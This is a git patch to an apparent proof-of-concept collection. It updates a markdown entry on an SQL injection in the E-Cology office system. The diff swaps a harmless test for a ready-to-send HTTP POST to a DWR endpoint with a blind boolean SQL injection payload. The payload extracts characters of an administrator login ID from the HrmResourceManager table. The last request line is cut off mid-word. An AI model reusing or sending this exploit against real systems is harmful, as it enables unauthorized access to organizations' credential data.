From faa904f1f15c409717cbd1509ae4b572a5148e44 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Fri, 8 Dec 2023 22:40:37 +0800
Subject: [PATCH] =?UTF-8?q?Update=20=E6=9F=90=E5=BE=AE=20E-Cology=20?=
 =?UTF-8?q?=E6=9F=90=E7=89=88=E6=9C=AC=20SQL=E6=B3=A8=E5=85=A5=E6=BC=8F?=
 =?UTF-8?q?=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 某微 E-Cology 某版本 SQL注入漏洞.md | 19 ++++++++++---------
 1 file changed, 10 insertions(+), 9 deletions(-)

diff --git a/某微 E-Cology 某版本 SQL注入漏洞.md b/某微 E-Cology 某版本 SQL注入漏洞.md
index fbf04f5..bfc7cdb 100644
--- a/某微 E-Cology 某版本 SQL注入漏洞.md	
+++ b/某微 E-Cology 某版本 SQL注入漏洞.md	
@@ -1,13 +1,13 @@
 ## 某微 E-Cology 某版本 SQL注入漏洞
 ```
-POST /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1
-Host: ip:port 
+POST /dwr/call/plaincall/DocDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1
+Host: ip
 User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
-Connection: close
-Content-Length: 189
-Content-Type: text/plain
+Content-Length: 191
 Accept-Encoding: gzip
-
+Connection: close
+Content-Type: text/plain
+ 
 callCount=1
 page=
 httpSessionId=
@@ -15,8 +15,9 @@ scriptSessionId=
 c0-scriptName=DocDwrUtil
 c0-methodName=ifNewsCheckOutByCurrentUser
 c0-id=0
-c0-param0=string:1 AND 1=1
-c0-param1=string:1
-batchId=0
+c0-param0=string:1 and ascii((select substring(loginid,1,1)from HrmResourceManager))=115
+c0-param1=strin
 
 ```
+![3a380d7bbc888fb3314bb6b512b4e7db](https://github.com/wy876/POC/assets/139549762/6d40d284-0894-4c18-89dc-5a978d4f5c79)
+